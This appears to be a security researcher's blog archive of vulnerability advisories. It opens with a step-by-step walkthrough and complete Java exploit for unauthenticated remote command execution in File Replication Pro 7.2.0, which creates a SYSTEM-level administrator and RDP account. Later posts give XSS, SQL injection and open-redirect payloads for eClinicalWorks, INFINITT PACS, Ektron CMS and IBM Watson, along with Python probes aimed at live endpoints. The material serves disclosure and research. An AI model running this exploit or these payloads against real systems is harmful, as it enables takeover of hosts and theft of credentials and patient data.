Category Archives: advisory

Exploiting File Replication Pro 7.2.0

* The information found in this post is for educational purposes only and not to be used for illegal purposes *

Recently, a security advisory on the vulnerabilities found in File Replication Pro 7.2.0 was released on this site. This post shows the steps involved in remotely gaining access to a system that has this software installed. As of the date of this post, the trial version of FRP 7.2.0 is still available for download at http://www.filereplicationpro.com.

* Note: A quick search on shodan.io with the keywords “FRP Node Ready” shows quite a number of vulnerable systems out there. *

That aside, the first step is to install the software. We will be using a Windows 7 machine for this demonstration. After running the installer, a few services are added to startup, namely three ‘prunsrv.exe’ processes as shown below. Note that the services run under the privileges of the NT AUTHORITY\SYSTEM account, so anything that gets these processes to run a command runs it as SYSTEM:

frp1

The unauthenticated remote command execution vulnerability abuses the way these processes handle password authentication, and yields command execution as the NT AUTHORITY\SYSTEM user. Using a browser, navigate to port 9200 on localhost, which runs the replication RPC service. You should see the following:

frp2

The “OK” at the end of the “>> FRP Node Ready>> C24EB17AEF0D61>> OK” output indicates that the RPC server does not require any form of authentication. This is the default behavior in a vanilla install. If you see “ERROR” instead of “OK”, the RPC server is configured with a password and authentication is required. However, a second vulnerability in the software allows unauthenticated remote file access, which can be abused to retrieve that password hash: the DetailedLogReader.jsp page on port 9100 takes an arbitrary file path in its log_path parameter, so FRP password hashes and configuration can be read remotely and without authentication using the following link:

http://127.0.0.1:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml

The password hash is visible in the configuration.xml file. If more clients have been added to the FRP management server, their password hashes will be listed there as well. If you explore further and look into the .jar and .war files in the installation directory to work out how the software talks to the RPC service, you can then write a malicious RPC client. The one in this example adds an arbitrary user to the remote system and then adds that user to both the Administrators and Remote Desktop Users groups.

The following exploit code is used in this example. Remember to replace the IP, port, and password variables accordingly:

/**
 * @author Jerold Hoong (Vantage Point Security)
 * File Replication Pro <= v7.2.0
 * Remote Command Execution PoC Working Exploit
 * www.vantagepoint.sg
 * NOTE: Put the FRP .jar files from the installation directory on the classpath to compile
 */

import java.util.HashMap;
import net.diasoft.frp.engine.model.AddressPort;
import net.diasoft.frp.engine.tcp.client.RPCDriver;
import net.diasoft.frp.engine.tcp.client.TCPConnection;

public class Main {

    static String ip = "1.2.3.4";
    static int port = 9200;
    // The password can be retrieved through the unauthenticated file disclosure
    // (DetailedLogReader.jsp -> configuration.xml). If no password is set, leave it blank.
    // Browse to http://<ip>:9200 first: "OK" = no authentication, "ERROR" = authentication required.
    static String password = ""; // example: the password 12345 is stored as jLIjfQZ5yojbZGTqxg2pY0VROWQ=

    // Account created on the target by the commands below
    static String user = "vantagepoint";
    static String userPassword = "LOLrofl1337!";

    // Sends a single ExecCommand RPC call. The FRP service runs the command as NT AUTHORITY\SYSTEM.
    // Returns true if the call completed without an exception.
    @SuppressWarnings({"rawtypes", "unchecked"})
    static boolean execCommand(RPCDriver rpc, String command) {
        HashMap p = new HashMap(); // raw type, as accepted by RPCDriver.callFunction
        if (command != null) {
            p.put("COMMAND", command);
        }
        try {
            rpc.callFunction("ExecCommand", p);
            System.out.println("Success!");
            return true;
        } catch (Exception e) { // RPCException, IOException or ClassNotFoundException from callFunction
            e.printStackTrace();
            return false;
        }
    }

    public static void main(String[] args) {
        AddressPort[] addresses = { new AddressPort(ip, port) };
        TCPConnection connection;
        try {
            connection = new TCPConnection(addresses, password, true);
        } catch (Exception e) {
            e.printStackTrace();
            return; // nothing to do without a connection
        }

        RPCDriver rpc = new RPCDriver(connection);

        // An ExecCommand call with no COMMAND parameter serves as a connectivity/authentication check
        System.out.print("Connecting to host... ");
        if (!execCommand(rpc, null)) {
            return;
        }

        System.out.print("Attempting to add user '" + user + "' with password '" + userPassword + "': ");
        execCommand(rpc, "net user " + user + " " + userPassword + " /add");

        System.out.print("Attempting to add user '" + user + "' to 'Administrators' group: ");
        execCommand(rpc, "net localgroup \"Administrators\" " + user + " /add");

        System.out.print("Attempting to add user '" + user + "' to 'Remote Desktop Users' group: ");
        execCommand(rpc, "net localgroup \"Remote Desktop Users\" " + user + " /add");

        System.out.print("\n\n---- END ----\n\n");
    }
}

The following screenshot shows the list of users on the Windows 7 system, before the exploit code was executed:

frp3

After the exploit code was successfully executed:

Screen Shot 2016-02-15 at 11.40.51 PM

frp4

frp5

If RDP is not enabled on the remote host, you can tweak the commands in the exploit to enable it. You should now be able to RDP to the machine and access it as an Administrator.

Here is a video showing the exploit in action:

Update: After a long time, the guys at FRP finally released the fixed version: https://frpsupport.fogbugz.com/default.asp?W291

frp2016-730-released

eClinicalWorks (CCMR) – Multiple Vulnerabilities

# Title: eClinicalWorks (CCMR) - Multiple Vulnerabilities
# Vendor: https://www.eclinicalworks.com
# Product: eClinicalWorks Population Health (CCMR) Client Portal Software 
# URL: https://www.eclinicalworks.com/products-services/population-health-ccmr/
# Credit: Jerold Hoong
-------------------------------------
# CVE-2015-4591 CROSS-SITE SCRIPTING
Cross-site scripting (XSS) vulnerability in login.jsp in eClinicalWorks Population Health (CCMR) Client Portal Software allows remote authenticated users to inject arbitrary javascript via the strMessage parameter.

https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage=%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E
-------------------------------------
# CVE-2015-4592 SQL INJECTION
SQL injection vulnerability in portalUserService.jsp in eClinicalWorks Population Health (CCMR) Client Portal Software allows remote authenticated users to inject arbitrary malicious database commands as part of user input.

Parameter: uemail (POST PARAMETER)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=

POST /mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp HTTP/1.1
Host: 127.0.0.1:443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/dashBoard.jsp
Content-Length: 186
[SNIP] ...
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
[SNIP] ...

action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=
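Confirming a time-based finding like this one needs more than a single slow response: network jitter or a busy database can produce a five-second delay on its own. The following Python harness is an added example, not part of the advisory or of eClinicalWorks. It sends the exact form body above three ways, untouched as a baseline, with the same injection syntax but a zero-second WAITFOR as a control, and with the five-second probe, and only reports the parameter injectable when the probe is consistently slower than both. The transport is passed in as a function, so the logic is exercised here against a constructed simulated server; http_sender() shows the real urllib POST (the session cookie is a placeholder you supply).

```python
"""Added example (not part of the advisory or of eClinicalWorks): confirm a
stacked-query, time-based SQL injection with a baseline and a zero-delay
control instead of trusting one slow response."""
import re
import statistics
import time
import urllib.parse
import urllib.request

# The exact form fields from the advisory's request body.
BASE = {
    "action": "updatePersonalInfo", "ufname": "john", "ulname": "doe",
    "upaddress": "", "upcity": "", "upstate": "", "zipcode": "",
    "uemail": "john.doe@test.com", "upphone": "0", "umobileno": "",
}


def mssql_delay_payload(value, seconds):
    """Close the string literal, stack a WAITFOR DELAY, comment out the rest (T-SQL)."""
    return "%s';WAITFOR DELAY '0:0:%d'--" % (value, seconds)


def confirm_time_based(send, params, param, delay=5, samples=3, margin=0.8):
    """send(params) -> elapsed seconds for one request.
    Injectable only if the delayed probe is slower than BOTH the untouched
    baseline and a control carrying the same injection syntax with a 0-second
    delay, so a slow response caused by the quote alone (e.g. an error page)
    is not mistaken for execution of WAITFOR."""
    def median_time(p):
        return statistics.median(send(p) for _ in range(samples))
    baseline = median_time(params)
    control = median_time(dict(params, **{param: mssql_delay_payload(params[param], 0)}))
    probe = median_time(dict(params, **{param: mssql_delay_payload(params[param], delay)}))
    return probe - max(baseline, control) >= delay * margin


def http_sender(url, cookie):
    """Real transport: POST the form as the portal's XHR does and return elapsed seconds."""
    def send(params):
        req = urllib.request.Request(
            url,
            data=urllib.parse.urlencode(params).encode(),
            headers={"Cookie": cookie, "X-Requested-With": "XMLHttpRequest",
                     "Content-Type": "application/x-www-form-urlencoded"},
        )
        start = time.monotonic()
        urllib.request.urlopen(req, timeout=60).read()
        return time.monotonic() - start
    return send


# Constructed stand-ins for the endpoint, used for the offline run below.
def simulated_vulnerable_server(params):
    """'Executes' any WAITFOR DELAY found in uemail and returns virtual elapsed time."""
    m = re.search(r"WAITFOR DELAY '0:0:(\d+)'", params["uemail"])
    return 0.25 + (int(m.group(1)) if m else 0)


def simulated_safe_server(params):
    """Parameterised query: input never reaches the SQL engine as code."""
    return 0.25


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:  # python confirm.py <portalUserService.jsp URL> <session cookie>
        sender = http_sender(sys.argv[1], sys.argv[2])
    else:
        sender = simulated_vulnerable_server
    print("uemail injectable:", confirm_time_based(sender, BASE, "uemail"))
```

The median over three samples and the 80% margin are conservative defaults; against a real target, raise `delay` rather than lowering `margin` if the link is noisy.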
-------------------------------------
# CVE-2015-4593 CROSS-SITE REQUEST FORGERY
Cross-site request forgery (CSRF) vulnerability in portalUserService.jsp in eClinicalWorks Client Portal allows remote attackers to hijack the authentication of content administrators for requests that could lead to the creation, modification and deletion of users, appointments and employees.
-------------------------------------
# CVE-2015-4594 SESSION FIXATION
The web application is vulnerable to session fixation attacks. When authenticating a user, the application does not assign a new session ID, so a session ID that an attacker obtained beforehand and planted in the victim's browser remains valid after the victim logs in.
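The fixation comes down to one missing step at login: the server keeps whatever session ID the client arrived with. The following Python model is an added example, not the application's code (class and function names are hypothetical, the credential is constructed). It reproduces the attack against a minimal session store and shows the fix, which is to invalidate the pre-authentication session and issue a fresh ID once the credentials are verified. In a JSP/Servlet application the equivalent is HttpServletRequest.changeSessionId() (Servlet 3.1) or session.invalidate() followed by request.getSession(true).

```python
"""Added example (not the application's code; names are hypothetical): a
minimal session store showing the session fixation flaw and the fix."""
import secrets

USERS = {"alice": "correct horse"}  # constructed demo credential


def check_credentials(username, password):
    return USERS.get(username) == password


class SessionStore:
    def __init__(self, rotate_on_login):
        self.rotate_on_login = rotate_on_login
        self.sessions = {}  # session id -> attributes

    def new_session(self):
        sid = secrets.token_hex(16)
        self.sessions[sid] = {}
        return sid

    def login(self, sid, username, password):
        """Authenticate inside the session the client presented.
        Vulnerable (rotate_on_login=False): the presented id is kept, so whoever
        chose it owns the authenticated session.
        Fixed (rotate_on_login=True): the pre-auth session is invalidated and a
        fresh id issued after the credentials check, which is what
        HttpServletRequest.changeSessionId() does in Servlet 3.1."""
        if sid not in self.sessions:
            sid = self.new_session()
        if not check_credentials(username, password):
            return sid, False
        if self.rotate_on_login:
            self.sessions.pop(sid)
            sid = self.new_session()
        self.sessions[sid]["user"] = username
        return sid, True

    def whoami(self, sid):
        return self.sessions.get(sid, {}).get("user")


def fixation_attack(store):
    """Attacker obtains a valid pre-auth id, plants it in the victim's browser
    (link, cookie injection, ...), waits for the victim to log in, then uses
    the planted id. Returns the user the attacker is now logged in as, or None."""
    planted = store.new_session()
    _victim_sid, ok = store.login(planted, "alice", "correct horse")
    if not ok:
        raise RuntimeError("victim login failed")
    return store.whoami(planted)


if __name__ == "__main__":
    print("vulnerable store, attacker sees:", fixation_attack(SessionStore(rotate_on_login=False)))
    print("fixed store, attacker sees:", fixation_attack(SessionStore(rotate_on_login=True)))
```

Rotating the ID also covers the case where the victim logs out and back in with the same planted cookie, because the planted ID is removed from the store, not merely detached from the user.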
-------------------------------------
# TIMELINE
- 16/06/2015: Vulnerability found
- 16/06/2015: Vendor informed
- 16/06/2015: Request for CVE IDs
- 16/06/2015: MITRE issued CVE numbers
- 16/06/2015: Vendor responded requesting more information on support contract etc.
- 21/06/2015: No support contract, vendor does not open case
- 22/06/2015: Requested update from vendor, no response
- 01/07/2015: Contacted vendor again, vendor asked for a support contract again
- 02/07/2015: No support contract, no response from vendor
- 31/01/2016: Public disclosure

INFINITT PACS – Multiple Vulnerabilities

# Title: INFINITT PACS Health Care System - Multiple Vulnerabilities
# Vendor: http://www.infinitt.com/cms/index
# Product: INFINITT PACS Health Care System
# Credit: Jerold Hoong
-------------------------------------
# CROSS-SITE SCRIPTING
Cross-site scripting (XSS) vulnerability in jerry.asp in INFINITT PACS Health Care System allows remote unauthenticated users to inject arbitrary javascript via the pname parameter.
-------------------------------------
# SQL INJECTION
SQL injection vulnerability in jerry.asp in INFINITT PACS Health Care System allows remote authenticated users to inject arbitrary malicious database commands as part of user input via the uid parameter.
-------------------------------------
# PASSWORDS ENCODED IN PACS DATABASE
The INFINITT PACS system does not hash or otherwise protect user account passwords when storing them in the database. Based on our observations, the application applies a simple character-substitution operation to each password character and stores the result directly in the database. Since the substitution is reversible, anyone with read access to the table can recover every account's password.
-------------------------------------
# INSECURE PROTOCOL USED
The INFINITT PACS system communicates with the DICOM component over plain HTTP. It uses HTTP Basic authentication when retrieving DICOM images from the server, so the user credentials travel in each request as a Base64-encoded header. Base64 is an encoding, not encryption: anyone who can observe the traffic can decode the header and obtain the credentials in plaintext.

CSRF and XSS Vulnerabilities in Ektron CMS 9.10 SP1

I found a couple of vulnerabilities in Ektron CMS 9.10 SP1. Below is the published advisory for anyone that is interested.

# Vulnerability type: Cross-site Request Forgery
# Vendor: http://www.ektron.com/
# Product: Ektron Content Management System
# Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.114)
# Patched version: 9.10 SP1 (Build 9.1.0.184.1.120)
# CVE ID: CVE-2015-3624
# Credit: Jerold Hoong

# PROOF OF CONCEPT (CSRF)

Cross-site request forgery (CSRF) vulnerability in MenuActions.aspx in Ektron CMS 9.10 SP1 before build 9.1.0.184.1.120 allows remote attackers to hijack the authentication of content administrators for requests that could lead to the deletion of content and assets.

csrf

# Vulnerability type: Cross-site Scripting
# Vendor: http://www.ektron.com/
# Product: Ektron Content Management System
# Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.102)
# Patched version: 9.10 SP1 (Build 9.1.0.184.1.114)
# CVE ID: CVE-2015-4427
# Credit: Jerold Hoong

# PROOF OF CONCEPT (XSS)

Cross-site scripting (XSS) vulnerability in workarea.aspx in Ektron CMS 9.10 SP1 on build 9.1.0.184.1.102 and earlier allows remote authenticated users to inject arbitrary javascript via the page, action, folder_id and LangType parameters.

GET /Test/WorkArea/workarea.aspx?page=content.aspx%27%3balert
%28%22XSS%22%29%2f%2f&action=ViewContentByCategory&folder_id=0
&LangType=1033 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
... [SNIP] ...
Cookie: EktGUID=014949ec-36ac-4b89-9c0b-8b03ed29b0ed; EkAnalytics=0;
ASP.NET_SessionId=zxucmt5zyugbtwrm4vseakw5;
... [SNIP] ...

# VULNERABLE PARAMETERS:
- page
- action
- folder_id
- LangType

# SAMPLE PAYLOAD
- ';alert("XSS")//

# TIMELINE
- 07/04/2015: Vulnerability found
- 07/04/2015: Vendor informed
- 08/04/2015: Vendor responded and acknowledged
- 01/05/2015: MITRE issued CVE number CVE-2015-3624 (CSRF)
- 28/05/2015: Vendor fixed the issue
- 31/05/2015: Public disclosure

Sample XSS Screenshot:
ektron_xss

IBM Watson SaaS Infrastructure Vulnerability

I recently found a couple of vulnerabilities in the SaaS cloud computing infrastructure of IBM Watson. After reporting the issue on the IBM PSIRT website and working with them to fix the issue, IBM replied with the following:

“Thanks for confirming that the issue has been fixed. Because this is a SaaS offering, we will not be publishing and acknowledging via security bulletin. However please know that we appreciate your cooperation and the effort to inform us of the vulnerability.”

Anyway, I have included the advisory below for anyone who is interested. It is interesting to see that trivial vulnerabilities like these are still in the wild.

# Vulnerability type: Cross-site Scripting & Redirect  
# Vendor: www.ibm.com
# Product: IBM Watson Cloud Computing SaaS (Cognea)
# Product Link: http://www.ibm.com/smarterplanet/us/en/ibmwatson/
# Credit: Jerold Hoong

The logout.jsp page function of the IBM Watson SaaS application is vulnerable to reflected XSS and redirect attacks. The value of the Referer HTTP header is directly referenced by the logout.jsp page, and the input is echoed unmodified into the application’s response.

# PROOF OF CONCEPT (XSS)

- Sample URL: http://127.0.0.1/test/logout.jsp
- Parameter: Referer HTTP header
- Payload: javascript:alert('XSS')//

# PROOF OF CONCEPT (Redirect)

The logout.jsp page is also vulnerable to unvalidated (open) redirects, since the Referer value it echoes is used as the redirect target.

- Sample URL: http://127.0.0.1/test/logout.jsp
- Parameter: Referer HTTP header
- Payload: http://malicious-site.com/
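The reflected XSS findings on this page (strMessage in login.jsp, pname in jerry.asp, the workarea.aspx parameters, and the Referer header here) share one root cause: the input comes back in the response without output encoding for the context it lands in. The following Python reflection checker is an added example, not from any of the vendors or advisories above. It sends a unique marker followed by the metacharacters <>"' and reports which of them survive, and whether the reflection lands inside a <script> block, where a surviving quote is enough on its own (the Ektron ';alert("XSS")// payload is exactly that case). It is a heuristic: it does not detect attribute-context breakouts, and it is run here against constructed responses; probe_referer() shows the real request for the logout.jsp case.

```python
"""Added example (not from any vendor or advisory on this page): reflection
checker for reflected XSS. Sends MARKER<>"' and reports which metacharacters
come back unencoded and in what context."""
import re
import secrets
import urllib.request

PROBE_CHARS = '<>"\''
ENTITY_RE = re.compile(r"&(#x[0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);")


def make_marker():
    """Unique, alphanumeric marker so the reflection can be located reliably."""
    return "zx" + secrets.token_hex(4) + "zx"


def probe_value(marker):
    return marker + PROBE_CHARS


def analyze(body, marker):
    """For each reflection of the marker, record which probe characters
    survived output encoding and whether the reflection sits inside <script>."""
    results = []
    for m in re.finditer(re.escape(marker), body):
        i, survived, seen = m.end(), "", 0
        while seen < len(PROBE_CHARS) and i < len(body):
            entity = ENTITY_RE.match(body, i)
            if entity:                    # encoded: this character was neutralised
                i = entity.end()
            elif body[i] in PROBE_CHARS:  # raw: it survived output encoding
                survived += body[i]
                i += 1
            else:
                break
            seen += 1
        before = body[:m.start()].lower()
        context = "script" if before.count("<script") > before.count("</script") else "html"
        results.append({"offset": m.start(), "survived": survived, "context": context})
    return results


def is_exploitable(body, marker):
    """Heuristic verdict: a raw '<' allows tag injection anywhere; inside a
    <script> block a surviving quote is enough to break out of a JS string.
    Attribute-context breakouts are not detected, so False is not proof of safety."""
    for r in analyze(body, marker):
        if "<" in r["survived"]:
            return True
        if r["context"] == "script" and ('"' in r["survived"] or "'" in r["survived"]):
            return True
    return False


def probe_referer(url, marker, timeout=10):
    """Real transport for the logout.jsp case: the injection point is the
    Referer header rather than a query parameter."""
    req = urllib.request.Request(url, headers={"Referer": probe_value(marker)})
    return urllib.request.urlopen(req, timeout=timeout).read().decode("utf-8", "replace")


# Constructed responses standing in for the three outcomes.
MARKER = "zxdeadbeefzx"
RAW_RESPONSE = '<div class="msg">' + probe_value(MARKER) + "</div>"                        # no encoding
ESCAPED_RESPONSE = "<div>" + MARKER + "&lt;&gt;&quot;&#39;</div>"                          # fully encoded
SCRIPT_RESPONSE = "<html><script>var page='" + MARKER + "&lt;&gt;\"'';</script></html>"  # quotes survive in JS

if __name__ == "__main__":
    import sys
    marker = make_marker()
    body = probe_referer(sys.argv[1], marker) if len(sys.argv) > 1 else RAW_RESPONSE.replace(MARKER, marker)
    for r in analyze(body, marker):
        print(r)
    print("exploitable:", is_exploitable(body, marker))
```

For query-string parameters such as strMessage or pname, build the URL with the same probe_value() and fetch it the same way; only the injection point changes.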

# TIMELINE
- 16/04/2015: Vulnerability found
- 17/04/2015: Vendor informed
- 18/04/2015: Vendor responded and acknowledged
- 03/06/2015: Vendor fixed the issue
- 04/06/2015: Public disclosure

Sample XSS screenshot:
IBM-Watson